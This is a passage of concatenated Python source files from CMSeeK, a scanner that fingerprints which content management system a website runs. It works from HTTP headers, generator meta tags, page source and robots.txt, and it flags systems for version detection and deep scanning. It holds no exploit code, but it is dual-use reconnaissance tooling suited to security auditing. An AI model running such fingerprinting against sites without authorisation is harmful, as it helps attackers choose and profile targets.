1044 | 'url':'https://sazito.com/', | |
1045 | 'vd':'0', | |
1046 | 'deeps':'0' | |
1047 | } | |
1048 | ||
1049 | shopatron = { | |
1050 | 'name':'Shopatron', | |
1051 | 'url':'https://www.shopatron.com', | |
1052 | 'vd':'0', | |
1053 | 'deeps':'0' | |
1054 | } | |
1055 | ||
1056 | umbraco = { | |
1057 | 'name':'Umbraco', | |
1058 | 'url':'https://umbraco.com', | |
1059 | 'vd':'1', | |
1060 | 'deeps':'1' | |
1061 | } | |
1062 | ||
1063 | shoper = { | |
1064 | 'name':'Shoper', | |
1065 | 'url':'https://www.shoper.pl', | |
1066 | 'vd':'0', | |
1067 | 'deeps':'0' | |
1068 | } | |
1069 | ||
1070 | shopery = { | |
1071 | 'name':'Shopery', | |
1072 | 'url':'https://shopery.com/', | |
1073 | 'vd':'0', | |
1074 | 'deeps':'0' | |
1075 | } | |
1076 | ||
1077 | shopfa = { | |
1078 | 'name':'ShopFA', | |
1079 | 'url':'https://shopfa.com/', | |
1080 | 'vd':'1', | |
1081 | 'deeps':'0' | |
1082 | } | |
1083 | ||
1084 | shopify = { | |
1085 | 'name':'Shopify', | |
1086 | 'url':'https://www.shopify.com/', | |
1087 | 'vd':'0', | |
1088 | 'deeps':'0' | |
1089 | } | |
1090 | ||
1091 | shoptet = { | |
1092 | 'name':'Shoptet', | |
1093 | 'url':'https://www.shoptet.cz/', | |
1094 | 'vd':'0', | |
1095 | 'deeps':'0' | |
1096 | } | |
1097 | ||
1098 | smartstore = { | |
1099 | 'name':'Smartstore', | |
1100 | 'url':'https://www.smartstore.com', | |
1101 | 'vd':'0', | |
1102 | 'deeps':'0' | |
1103 | } | |
1104 | ||
1105 | solusquare = { | |
1106 | 'name':'Solusquare Commerce Cloud', | |
1107 | 'url':'https://www.solusquare.com/', | |
1108 | 'vd':'0', | |
1109 | 'deeps':'0' | |
1110 | } | |
1111 | ||
1112 | spree = { | |
1113 | 'name':'Spree', | |
1114 | 'url':'https://spreecommerce.org/', | |
1115 | 'vd':'0', | |
1116 | 'deeps':'0' | |
1117 | } | |
1118 | ||
1119 | bitrix = { | |
1120 | 'name':'Bitrix', | |
1121 | 'url':'https://www.1c-bitrix.ru', | |
1122 | 'vd':'0', | |
1123 | 'deeps':'0' | |
1124 | } | |
1125 | ||
1126 | brightspot = { | |
1127 | 'name':'Brightspot CMS', | |
1128 | 'url':'https://www.brightspot.com/', | |
1129 | 'vd':'0', | |
1130 | 'deeps':'0' | |
1131 | } | |
1132 | ||
1133 | amiro = { | |
1134 | 'name':'Amiro.CMS', | |
1135 | 'url':'https://www.amiro.ru', | |
1136 | 'vd':'1', | |
1137 | 'deeps':'0' | |
1138 | } | |
1139 | ||
1140 | weebly = { | |
1141 | 'name':'Weebly', | |
1142 | 'url':'https://www.weebly.com/', | |
1143 | 'vd':'0', | |
1144 | 'deeps':'0' | |
1145 | } | |
1146 | ||
1147 | ekmps = { | |
1148 | 'name':'ekmPowershop', | |
1149 | 'url':'https://www.ekm.com/', | |
1150 | 'vd':'0', | |
1151 | 'deeps':'0' | |
1152 | } | |
1153 | ||
1154 | godaddywb = { | |
1155 | 'name':'GoDaddy Website Builder', | |
1156 | 'url':'https://godaddy.com/websites/website-builder', | |
1157 | 'vd':'1', | |
1158 | 'deeps':'0' | |
1159 | } | |
1160 | ||
1161 | whmcs = { | |
1162 | 'name':'WHMCS', | |
1163 | 'url':'https://www.whmcs.com/', | |
1164 | 'vd':'0', | |
1165 | 'deeps':'0' | |
1166 | } | |
1167 | ||
1168 | opennemas = { | |
1169 | 'name':'OpenNemas CMS', | |
1170 | 'url':'https://www.opennemas.com/', | |
1171 | 'vd':'0', | |
1172 | 'deeps':'0' | |
1173 | } | |
1174 | ||
1175 | zencart = { | |
1176 | 'name':'Zen Cart CMS', | |
1177 | 'url':'https://www.zen-cart.com/', | |
1178 | 'vd':'0', | |
1179 | 'deeps':'0' | |
1180 | } | |
1181 | ||
1182 | ipo = { | |
1183 | 'name':'IPO CMS', | |
1184 | 'url':'https://www.antee.cz/', | |
1185 | 'vd':'0', | |
1186 | 'deeps':'0' | |
1187 | }⏎ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Verbose | |
6 | verbose = False | |
7 | ||
8 | # GitHub repo link | |
9 | GIT_URL = 'https://github.com/Tuhinshubhra/CMSeeK' | |
10 | ||
11 | # Version thingy | |
12 | try: | |
13 | rv = open('current_version', 'r') | |
14 | cver = rv.read().replace('\n','') | |
15 | cmseek_version = cver | |
16 | except: | |
17 | cmseek_version = '1.1.3' # Failsafe measure i guess | |
18 | ||
19 | # well the log containing variable, no need to edit anything here | |
20 | log = '{"url":"","last_scanned":"","detection_param":"","cms_id":"","cms_name":"","cms_url":""}' | |
21 | log_dir = "" | |
22 | ||
23 | # access_directory contains the path to the directory where reports directory and reports.json files are saved | |
24 | # leave it empty to use default dir (cmseek directory if writeaccess else the current directory the user is in) | |
25 | # if you want to use a custom path.. enter the full path below | |
26 | ||
27 | access_directory = ""⏎ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | ## Core Rev 4, stable, strong and accurate | |
6 | ||
7 | import sys | |
8 | import os | |
9 | import http.client | |
10 | import urllib.request | |
11 | import json | |
12 | import importlib | |
13 | from datetime import datetime | |
14 | import time | |
15 | ||
16 | import VersionDetect.detect as version_detect # Version detection | |
17 | import deepscans.core as advanced # Deep scan and Version Detection functions | |
18 | import cmseekdb.basic as cmseek # All the basic functions | |
19 | import cmseekdb.sc as source # Contains function to detect cms from source code | |
20 | import cmseekdb.header as header # Contains function to detect CMS from gathered http headers | |
21 | import cmseekdb.cmss as cmsdb # Contains basic info about the CMSs | |
22 | import cmseekdb.robots as robots | |
23 | import cmseekdb.generator as generator | |
24 | import cmseekdb.result as result | |
25 | ||
26 | def main_proc(site,cua): | |
27 | ||
28 | # Check for skip_scanned | |
29 | if cmseek.skip_scanned: | |
30 | for csite in cmseek.report_index['results'][0]: | |
31 | if site == csite and cmseek.report_index['results'][0][site]['cms_id'] != '': | |
32 | cmseek.warning('Skipping {0} as it was previously scanned!'.format(cmseek.red + site + cmseek.cln)) | |
33 | return | |
34 | ||
35 | cmseek.clearscreen() | |
36 | cmseek.banner("CMS Detection And Deep Scan") | |
37 | cmseek.info("Scanning Site: " + site) | |
38 | cmseek.statement("User Agent: " + cua) | |
39 | cmseek.statement("Collecting Headers and Page Source for Analysis") | |
40 | init_source = cmseek.getsource(site, cua) | |
41 | if init_source[0] != '1': | |
42 | cmseek.error("Aborting CMSeek! Couldn't connect to site \n Error: %s" % init_source[1]) | |
43 | return | |
44 | else: | |
45 | scode = init_source[1] | |
46 | headers = init_source[2] | |
47 | if site != init_source[3] and site + '/' != init_source[3]: | |
48 | if cmseek.redirect_conf == '0': | |
49 | cmseek.info('Target redirected to: ' + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln) | |
50 | if not cmseek.batch_mode: | |
51 | follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln + ' as target? (y/n): ') | |
52 | else: | |
53 | follow_redir = 'y' | |
54 | if follow_redir.lower() == 'y': | |
55 | site = init_source[3] | |
56 | cmseek.statement("Reinitiating Headers and Page Source for Analysis") | |
57 | tmp_req = cmseek.getsource(site, cua) | |
58 | scode = tmp_req[1] | |
59 | headers = tmp_req[2] | |
60 | elif cmseek.redirect_conf == '1': | |
61 | site = init_source[3] | |
62 | cmseek.info("Followed redirect, New target: " + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln) | |
63 | cmseek.statement("Reinitiating Headers and Page Source for Analysis") | |
64 | tmp_req = cmseek.getsource(site, cua) | |
65 | scode = tmp_req[1] | |
66 | headers = tmp_req[2] | |
67 | else: | |
68 | cmseek.statement("Skipping redirect to " + cmseek.bold + cmseek.red + init_source[3] + cmseek.cln) | |
69 | if scode == '': | |
70 | # silly little check thought it'd come handy | |
71 | cmseek.error('Aborting detection, source code empty') | |
72 | return | |
73 | ||
74 | cmseek.statement("Detection Started") | |
75 | ||
76 | ## init variables | |
77 | cms = '' # the cms id if detected | |
78 | cms_detected = '0' # self explanotory | |
79 | detection_method = '' # ^ | |
80 | ga = '0' # is generator available | |
81 | ga_content = '' # Generator content | |
82 | ||
83 | ## Parse generator meta tag | |
84 | parse_generator = generator.parse(scode) | |
85 | ga = parse_generator[0] | |
86 | ga_content = parse_generator[1] | |
87 | ||
88 | cmseek.statement("Using headers to detect CMS (Stage 1 of 4)") | |
89 | header_detection = header.check(headers) | |
90 | ||
91 | if header_detection[0] == '1': | |
92 | detection_method = 'header' | |
93 | cms = header_detection[1] | |
94 | cms_detected = '1' | |
95 | ||
96 | if cms_detected == '0': | |
97 | if ga == '1': | |
98 | # cms detection via generator | |
99 | cmseek.statement("Using Generator meta tag to detect CMS (Stage 2 of 4)") | |
100 | gen_detection = generator.scan(ga_content) | |
101 | if gen_detection[0] == '1': | |
102 | detection_method = 'generator' | |
103 | cms = gen_detection[1] | |
104 | cms_detected = '1' | |
105 | else: | |
106 | cmseek.statement('Skipping stage 2 of 4: No Generator meta tag found') | |
107 | ||
108 | if cms_detected == '0': | |
109 | # Check cms using source code | |
110 | cmseek.statement("Using source code to detect CMS (Stage 3 of 4)") | |
111 | source_check = source.check(scode, site) | |
112 | if source_check[0] == '1': | |
113 | detection_method = 'source' | |
114 | cms = source_check[1] | |
115 | cms_detected = '1' | |
116 | ||
117 | if cms_detected == '0': | |
118 | # Check cms using robots.txt | |
119 | cmseek.statement("Using robots.txt to detect CMS (Stage 4 of 4)") | |
120 | robots_check = robots.check(site, cua) | |
121 | if robots_check[0] == '1': | |
122 | detection_method = 'robots' | |
123 | cms = robots_check[1] | |
124 | cms_detected = '1' | |
125 | ||
126 | if cms_detected == '1': | |
127 | cmseek.success('CMS Detected, CMS ID: ' + cmseek.bold + cmseek.fgreen + cms + cmseek.cln + ', Detection method: ' + cmseek.bold + cmseek.lblue + detection_method + cmseek.cln) | |
128 | cmseek.update_log('detection_param', detection_method) | |
129 | cmseek.update_log('cms_id', cms) # update log | |
130 | cmseek.statement('Getting CMS info from database') # freaking typo | |
131 | cms_info = getattr(cmsdb, cms) | |
132 | ||
133 | if cms_info['deeps'] == '1' and not cmseek.light_scan and not cmseek.only_cms: | |
134 | # cmseek.success('Starting ' + cmseek.bold + cms_info['name'] + ' deep scan' + cmseek.cln) | |
135 | advanced.start(cms, site, cua, ga, scode, ga_content, detection_method, headers) | |
136 | return | |
137 | ||
138 | elif cms_info['vd'] == '1' and not cmseek.only_cms: | |
139 | cmseek.success('Starting version detection') | |
140 | cms_version = '0' # Failsafe measure | |
141 | cms_version = version_detect.start(cms, site, cua, ga, scode, ga_content, headers) | |
142 | cmseek.clearscreen() | |
143 | cmseek.banner("CMS Scan Results") | |
144 | result.target(site) | |
145 | result.cms(cms_info['name'],cms_version,cms_info['url']) | |
146 | cmseek.update_log('cms_name', cms_info['name']) # update log | |
147 | if cms_version != '0' and cms_version != None: | |
148 | cmseek.update_log('cms_version', cms_version) # update log | |
149 | cmseek.update_log('cms_url', cms_info['url']) # update log | |
150 | comptime = round(time.time() - cmseek.cstart, 2) | |
151 | log_file = os.path.join(cmseek.log_dir, 'cms.json') | |
152 | result.end(str(cmseek.total_requests), str(comptime), log_file) | |
153 | ''' | |
154 | cmseek.result('Target: ', site) | |
155 | cmseek.result("Detected CMS: ", cms_info['name']) | |
156 | cmseek.update_log('cms_name', cms_info['name']) # update log | |
157 | if cms_version != '0' and cms_version != None: | |
158 | cmseek.result("CMS Version: ", cms_version) | |
159 | cmseek.update_log('cms_version', cms_version) # update log | |
160 | cmseek.result("CMS URL: ", cms_info['url']) | |
161 | cmseek.update_log('cms_url', cms_info['url']) # update log | |
162 | ''' | |
163 | return | |
164 | else: | |
165 | # nor version detect neither DeepScan available | |
166 | cmseek.clearscreen() | |
167 | cmseek.banner("CMS Scan Results") | |
168 | result.target(site) | |
169 | result.cms(cms_info['name'],'0',cms_info['url']) | |
170 | cmseek.update_log('cms_name', cms_info['name']) # update log | |
171 | cmseek.update_log('cms_url', cms_info['url']) # update log | |
172 | comptime = round(time.time() - cmseek.cstart, 2) | |
173 | log_file = os.path.join(cmseek.log_dir, 'cms.json') | |
174 | result.end(str(cmseek.total_requests), str(comptime), log_file) | |
175 | ''' | |
176 | cmseek.result('Target: ', site) | |
177 | cmseek.result("Detected CMS: ", cms_info['name']) | |
178 | cmseek.update_log('cms_name', cms_info['name']) # update log | |
179 | cmseek.result("CMS URL: ", cms_info['url']) | |
180 | cmseek.update_log('cms_url', cms_info['url']) # update log | |
181 | ''' | |
182 | return | |
183 | else: | |
184 | print('\n') | |
185 | cmseek.error('CMS Detection failed, if you know the cms please help me improve CMSeeK by reporting the cms along with the target by creating an issue') | |
186 | print(''' | |
187 | {2}Create issue:{3} https://github.com/Tuhinshubhra/CMSeeK/issues/new | |
188 | ||
189 | {4}Title:{5} [SUGGESTION] CMS detction failed! | |
190 | {6}Content:{7} | |
191 | - CMSeeK Version: {0} | |
192 | - Target: {1} | |
193 | - Probable CMS: <name and/or cms url> | |
194 | ||
195 | N.B: Create issue only if you are sure, please avoid spamming! | |
196 | '''.format(cmseek.cmseek_version, site, cmseek.bold, cmseek.cln, cmseek.bold, cmseek.cln, cmseek.bold, cmseek.cln)) | |
197 | return | |
198 | return |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import os | |
6 | import json | |
7 | import datetime | |
8 | import cmseekdb.basic as cmseek | |
9 | import logging, traceback | |
10 | ||
11 | def init(cmseek_dir, report_dir=""): | |
12 | ''' | |
13 | Creates/Updates result index | |
14 | Needed Parameters: | |
15 | cmseek_dir = CMSeeK directory / access_directory | |
16 | report_dir = path to report directory leave empty if default | |
17 | ''' | |
18 | # Create a json list of all the sites scanned and save it to <cmseek_dir>/reports.json | |
19 | cmseek.info('Updating CMSeeK result index...') | |
20 | if os.path.isdir(cmseek_dir): | |
21 | index_file = os.path.join(cmseek_dir, 'reports.json') | |
22 | if report_dir == "": | |
23 | report_dir = os.path.join(cmseek_dir, 'Result') | |
24 | if os.path.isdir(report_dir): | |
25 | result_index = {} | |
26 | result_dirs = os.listdir(report_dir) | |
27 | for result_dir in result_dirs: | |
28 | scan_file = os.path.join(report_dir, result_dir, 'cms.json') | |
29 | if os.path.isfile(scan_file): | |
30 | try: | |
31 | with open(scan_file, 'r', encoding='utf8') as sf: | |
32 | scan_content = json.loads(sf.read()) | |
33 | scan_url = scan_content['url'] | |
34 | result_index[scan_url] = {"cms_id": scan_content['cms_id'],"date": scan_content['last_scanned'],"report":scan_file} | |
35 | except Exception as e: | |
36 | logging.error(traceback.format_exc()) | |
37 | cmseek.statement('Skipping invalid CMSeeK result: ' + scan_file) | |
38 | # Write index | |
39 | result_index = {"last_updated":str(datetime.datetime.now()), "results":[result_index]} | |
40 | inf = open(index_file, 'w+') | |
41 | inf.write(json.dumps(result_index, sort_keys=False, indent=4)) | |
42 | inf.close() | |
43 | cmseek.success('Report index updated successfully!') | |
44 | cmseek.report_index = result_index | |
45 | return ['1', 'Report index updated successfully!'] | |
46 | ||
47 | else: | |
48 | cmseek.error('Result directory does not exist!') | |
49 | return [0, 'Result directory does not exist'] | |
50 | ||
51 | else: | |
52 | cmseek.error('Invalid CMSeeK directory passed!') | |
53 | return [0, 'CMSeeK directory does not exist'] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Precise and Hawt | |
6 | ||
7 | from html.parser import HTMLParser | |
8 | import cmseekdb.basic as cmseek | |
9 | ||
10 | ga = '0' | |
11 | ga_content = '' | |
12 | ||
13 | class MyHTMLParser(HTMLParser): | |
14 | def handle_starttag(self, tag, attrs): | |
15 | if 'meta' in tag.lower(): | |
16 | for nm,vl in attrs: | |
17 | if nm == "name" and vl.lower() == 'generator': | |
18 | for a,b in attrs: | |
19 | if a == 'content': | |
20 | global ga, ga_content | |
21 | ga = '1' | |
22 | ga_content += ' ' + b | |
23 | ||
24 | def parse(source): | |
25 | # clean up ga, ga_content (fix some weird multiple sites scan issue) | |
26 | global ga, ga_content | |
27 | ga = '0' | |
28 | ga_content = '' | |
29 | parser = MyHTMLParser() | |
30 | parser.feed(source) | |
31 | return [ga, ga_content] | |
32 | ||
33 | def scan(content): | |
34 | hstring = content.lower() | |
35 | if content == '': | |
36 | return ['0', ''] | |
37 | ||
38 | generator_tag_detection_keys = ['wordpress:-wp', | |
39 | 'blogger:-blg', | |
40 | 'ghost:-ghost', | |
41 | 'asciidoc:-asciid', | |
42 | 'drupal:-dru', | |
43 | 'bolt:-bolt', | |
44 | 'browsercms:-brcms', | |
45 | 'ckan:-ckan', | |
46 | 'cms made simple:-cmds', | |
47 | 'cmsimple:-csim', | |
48 | 'xpressengine:-xe', | |
49 | 'typo3 cms:-tp3', | |
50 | 'textpattern cms:-tpc', | |
51 | 'ametys cms open source (http://www.ametys.org:-amcms', | |
52 | 'joomla! - open source content management||Joomla! - the dynamic portal engine and content management system||joomla:-joom', | |
53 | 'xoops:-xoops', | |
54 | 'wix.com:-wix', | |
55 | 'cms: website baker||www.websitebaker.org:-wb', | |
56 | 'webgui:-wgui', | |
57 | 'subrion cms:-subcms', | |
58 | 'tiki wiki cms groupware||http://tiki.org:-tiki', | |
59 | 'snews:-snews', | |
60 | 'silverstripe:-sst', | |
61 | 'silva:-silva', | |
62 | 'serendipity:-spity', | |
63 | 'seamless.cms.webgui:-slcms', | |
64 | 'rock:-rock', | |
65 | 'roadiz:-roadz', | |
66 | 'ritecms:-rite', | |
67 | 'rcms:-rcms', | |
68 | 'quick.cms:-quick', | |
69 | 'phpwind:-pwind', | |
70 | 'percussion:-percms', | |
71 | 'ophal||ophal.org:-ophal', | |
72 | 'odoo:-odoo', | |
73 | 'sitefinity:-sfy', | |
74 | 'microsoft sharePoint:-share', | |
75 | 'mura cms:-mura', | |
76 | 'mambo:-mambo', | |
77 | 'koken:-koken', | |
78 | 'indexhibit:-ibit', | |
79 | 'webflow:-wflow', | |
80 | 'jalios jcms:-jcms', | |
81 | 'impresspages cms:-impage', | |
82 | 'hotaru cms:-hotaru', | |
83 | 'gravcms:-grav', | |
84 | 'getsimple:-gsimp', | |
85 | 'fork cms:-fork', | |
86 | 'php-nuke:-phpn', | |
87 | 'flexcmp:-flex', | |
88 | 'ez publish:-ezpu', | |
89 | 'episerver:-epis', | |
90 | 'dotnetnuke:-dnn', | |
91 | 'seomatic:-craft', | |
92 | 'cpg dragonfly cms:-dragon', | |
93 | 'cotonti:-coton', | |
94 | 'orchard:-orchd', | |
95 | 'contentbox:-cbox', | |
96 | 'contensis cms:-cntsis', | |
97 | 'contenido:-cnido', | |
98 | 'contao:-contao', | |
99 | 'concrete5:-con5', | |
100 | 'discourse:-dscrs', | |
101 | 'discuz!:-discuz', | |
102 | 'uknowva:-uknva', | |
103 | 'beehive forum:-bhf', | |
104 | 'ubb.threads:-ubbt', | |
105 | 'cubecart:-cubec', | |
106 | 'dynamicweb:-dweb', | |
107 | 'ez publish:-ezpub', | |
108 | 'prestashop:-presta', | |
109 | 'proximis omnichannel:-pmoc', | |
110 | 'quick.cart:-qcart', | |
111 | 'rbs change:-rbsc', | |
112 | 'sazito:-sazito', | |
113 | 'shopfa:-shopfa', | |
114 | 'solusquare:-solusquare', | |
115 | 'amiro.cms||www.amiro.ru:-amiro', | |
116 | 'starfield technologies; go daddy website builder:-godaddywb', | |
117 | 'opennemas:-opennemas', | |
118 | 'zen-cart.com||zen cart:-zencart' | |
119 | ] | |
120 | ||
121 | for detection_key in generator_tag_detection_keys: | |
122 | if ':-' in detection_key: | |
123 | detection_array = detection_key.split(':-') | |
124 | if '||' in detection_array[0]: | |
125 | detection_strings = detection_array[0].split('||') | |
126 | for detection_string in detection_strings: | |
127 | if detection_string in hstring and detection_array[1] not in cmseek.ignore_cms: | |
128 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
129 | return ['1', detection_array[1]] | |
130 | else: | |
131 | if detection_array[0] in hstring and detection_array[1] not in cmseek.ignore_cms: | |
132 | if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms: | |
133 | return ['1', detection_array[1]] | |
134 | ||
135 | return ['0', ''] |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | import urllib.request | |
6 | from http.cookiejar import CookieJar | |
7 | ||
8 | def getrawsource(url, ua): | |
9 | if url == "": # Empty freakin shit | |
10 | r = ['0','Empty URL Provided','', ''] | |
11 | return r | |
12 | try: | |
13 | ckreq = urllib.request.Request( | |
14 | url, | |
15 | data=None, | |
16 | headers={ | |
17 | 'User-Agent': ua, | |
18 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', | |
19 | 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', | |
20 | #'Accept-Encoding': 'gzip, deflate, sdch', | |
21 | 'Accept-Language': 'en-US,en;q=0.8', | |
22 | 'Connection': 'keep-alive' | |
23 | } | |
24 | ) | |
25 | cj = CookieJar() | |
26 | opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) | |
27 | with opener.open(ckreq, timeout=8) as response: | |
28 | scode = response.read().decode("utf-8", 'ignore') | |
29 | headers = str(response.info()) | |
30 | rurl = response.geturl() | |
31 | return ['1', scode, headers, rurl] ## 'success code', 'source code', 'http headers', 'redirect url' | |
32 | # return r | |
33 | except Exception as e: | |
34 | try: | |
35 | ecode = str(e.code) | |
36 | ehed = str(e.info()) | |
37 | return ['2', str(e), ecode, ehed] ## will come in handy evading good guys | |
38 | # return r | |
39 | except Exception as f: | |
40 | return ['2', str(e), '', ''] ## 'error code', 'error message', 'empty' | |
41 | #return r |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | # This file contains all the methods of detecting cms via http Headers | |
5 | # Version: 1.0.0 | |
6 | # Return a list with ['1'/'0','ID of CMS'/'na'] 1 = detected 0 = not detected | |
7 | import re | |
8 | import cmseekdb.basic as cmseek | |
9 | ||
10 | def check(hstring): | |
11 | if hstring == "": | |
12 | return ['0', 'na'] | |
13 | else: | |
14 | #hstring = h | |
15 | # harray = h.split("\n") # will use whenever necessary | |
16 | ||
17 | #### START DETECTION FROM HERE | |
18 | ||
19 | header_detection_keys = [ | |
20 | '/wp-json/:-wp', | |
21 | 'X-Drupal-||19 Nov 1978 05:-dru', | |
22 | 'Expires: Wed, 17 Aug 2005 00:00:00 GMT:-joom', | |
23 | 'X-Wix-:-wix', | |
24 | 'Set-Cookie: ushahidi:-ushahidi', | |
25 | 'X-Generated-By: UMI.CMS:-umi', | |
26 | 'x-generator: Sulu:-sulu', | |
27 | 'X-Powered-CMS: Subrion CMS:-subcms', | |
28 | 'Set-Cookie: SQ_SYSTEM_SESSION||squizedge.net:-sqm', | |
29 | 'spincms:-spin', | |
30 | 'solodev_session:-sdev', | |
31 | 'SC_ANALYTICS_GLOBAL_COOKIE:-score', | |
32 | 'X-ServedBy: simplebo||_simplebo_tool_session:-spb', | |
33 | 'X-Blog: Serendipity||Set-Cookie: serendipity[||Set-Cookie: s9y_:-spity', | |
34 | 'Set-Cookie: SEAMLESS_IDENTIFIER:-slcms', | |
35 | 'X-Powered-By: Roadiz CMS:-roadz', | |
36 | 'X-Powered-By: pimcore:-pcore', | |
37 | 'x-powered-by: PencilBlue:-pblue', | |
38 | 'x-powered-by: Ophal:-ophal', | |
39 | 'Server: OpenCms:-ocms', | |
40 | 'X-Odoo-:-odoo', | |
41 | 'X-SharePointHealthScore||SPIisLatency||SPRequestGuid||MicrosoftSharePointTeamServices||SPRequestDuration:-share', | |
42 | 'october_session:-octcms', | |
43 | 'Generator: Mura CMS:-mura', | |
44 | 'X-Powered-By: MODX:-modx', | |
45 | 'X-KoobooCMS-Version:-kbcms', | |
46 | 'X-Jimdo-:-jimdo', | |
47 | 'Set-Cookie: ndxz_:-ibit', | |
48 | 'X-Jcms-Ajax-Id:-jcms', | |
49 | 'Set-Cookie: grav-site-:-grav', | |
50 | 'X-Powered-By: FlexCMP||X-Flex-Tag:||X-Flex-Lang:||X-Flex-Lastmod:||X-Flex-Community:||X-Flex-Evstart:-flex', | |
51 | 'X-Powered-By: eZ Publish||Set-Cookie: eZSESSID:-ezpu', | |
52 | 'Set-Cookie: exp_tracker||Set-Cookie: exp_last_activity||Set-Cookie: exp_last_visit||Set-Cookie: exp_csrf_token=:-exen', | |
53 | 'X-Powered-By: e107||Set-Cookie: SESSE107COOKIE:-e107', | |
54 | 'Set-Cookie: dnn_IsMobile||DNNOutputCache||DotNetNuke:-dnn', | |
55 | 'X-Powered-By: CMS Danneo:-dncms', | |
56 | 'X-Powered-By: Craft CMS||Set-Cookie: CraftSessionId:-craft', | |
57 | 'X-Powered-By: Dragonfly CMS:-dragon', | |
58 | 'X-Generator: Orchard:-orchd', | |
59 | 'X-Powered-By: ContentBox||Set-Cookie: LIGHTBOXSESSION:-cbox', | |
60 | 'Set-Cookie: CONCRETE5:-con5', | |
61 | 'X-Discourse-Route:-dscrs', | |
62 | 'Set-Cookie: flarum_session=:-flarum', | |
63 | 'IPSSessionFront||ipbWWLmodpids||ipbWWLsession_id:-ipb', | |
64 | 'X-Powered-By: NodeBB:-nodebb', | |
65 | 'X-Garden-Version: Vanilla||Maybe you should be reading this instead: https://www.vanillaforums.com/en/careers:-vanilla', | |
66 | 'Set-Cookie: xf_session=||Set-Cookie: xf_csrf=:-xf', | |
67 | '[aefsid]:-aef', | |
68 | 'Set-Cookie: fud_session_:-fudf', | |
69 | 'Set-Cookie: phorum_session:-phorum', | |
70 | 'Set-Cookie: yazdLastVisited=:-yazd', | |
71 | 'Set-Cookie: ubbt_:-ubbt', | |
72 | 'X-Powered-By: Afosto||Link: <//afosto-cdn:-afsto', | |
73 | 'X-Arastta:-arstta', | |
74 | 'set-cookie: fornax_anonymousId=:-bigc', | |
75 | 'Set-Cookie: bigwareCsid||Set-Cookie: bigWAdminID:-bigw', | |
76 | 'X-ATG-Version:-oracle_atg', | |
77 | 'Set-Cookie: MoodleSession||Set-Cookie: MOODLEID_:-mdle', | |
78 | 'COMMERCE-SERVER-SOFTWARE:||commerce-server-software::-coms', | |
79 | 'Set-Cookie: COSMOSHOP_:-cosmos', | |
80 | 'Set-Cookie: Dynamicweb:-dweb', | |
81 | 'X-Elcodi::-elcd', | |
82 | 'X-Powered-By: eZ Publish:-ezpub', | |
83 | 'Powered-By: PrestaShop||Set-Cookie: PrestaShop:-presta', | |
84 | 'Demandware Secure Token||Demandware anonymous cookie||dwpersonalization_||dwanonymous_:-sfcc', | |
85 | 'X-Umbraco-Version:-umbraco', | |
86 | 'X-Shopery||This E-commerce is built using Shopery:-shopery', | |
87 | 'X-Powered-By: ShopFA:-shopfa', | |
88 | 'X-ShopId::::X-ShardId:-shopify', | |
89 | 'X-Shopify-Stage||set-cookie: _shopify||Set-Cookie: secure_customer_sig:-shopify', | |
90 | 'SRV_ID=shoptet:-shoptet', | |
91 | 'Set-Cookie: _SOLUSQUARE:-solusquare', | |
92 | 'Set-Cookie: _spree_store_session:-spree', | |
93 | 'X-Powered-CMS: Bitrix Site Manager:-bitrix', | |
94 | 'X-Powered-By: Brightspot:-brightspot', | |
95 | 'Set-Cookie: WHMCS:-whmcs', | |
96 | 'X-Powered-By: OpenNemas||Via: Opennemas Proxy Server:-opennemas' | |
97 | ] | |
98 | for header_key in header_detection_keys: | |
99 | if ':-' in header_key: | |
100 | detection_string = header_key.split(':-') | |
101 | if '||' in detection_string[0]: | |
102 | # check if there are multiple detection strings | |
103 | detection_strings = detection_string[0].split('||') | |
104 | for d in detection_strings: | |
105 | if d in hstring and detection_string[1] not in cmseek.ignore_cms: # ignore cms thingy - what i mean is check if the cms_id is not in the ignore list | |
106 | if cmseek.strict_cms == [] or detection_string[1] in cmseek.strict_cms: | |
107 | return ['1', detection_string[1]] | |
108 | elif '::::' in detection_string[0]: | |
109 | # :::: is used when we want to check if both detection strings are present in the header. | |
110 | match_status = '0' # 0 = neutral, 1 = passed, 2 = failed | |
111 | keys_to_match = detection_string[0].split('::::') | |
112 | for check_key in keys_to_match: | |
113 | if match_status == '0' or match_status == '1': | |
114 | if check_key in hstring: | |
115 | match_status = '1' | |
116 | else: | |
117 | match_status = '2' | |
118 | else: | |
119 | match_status = '2' | |
120 | if match_status == '1' and detection_string[1] not in cmseek.ignore_cms: | |
121 | if cmseek.strict_cms == [] or detection_string[1] in cmseek.strict_cms: | |
122 | return ['1', detection_string[1]] | |
123 | else: | |
124 | if detection_string[0] in hstring and detection_string[1] not in cmseek.ignore_cms: | |
125 | if cmseek.strict_cms == [] or detection_string[1] in cmseek.strict_cms: | |
126 | return ['1', detection_string[1]] | |
127 | ||
128 | #################################################### | |
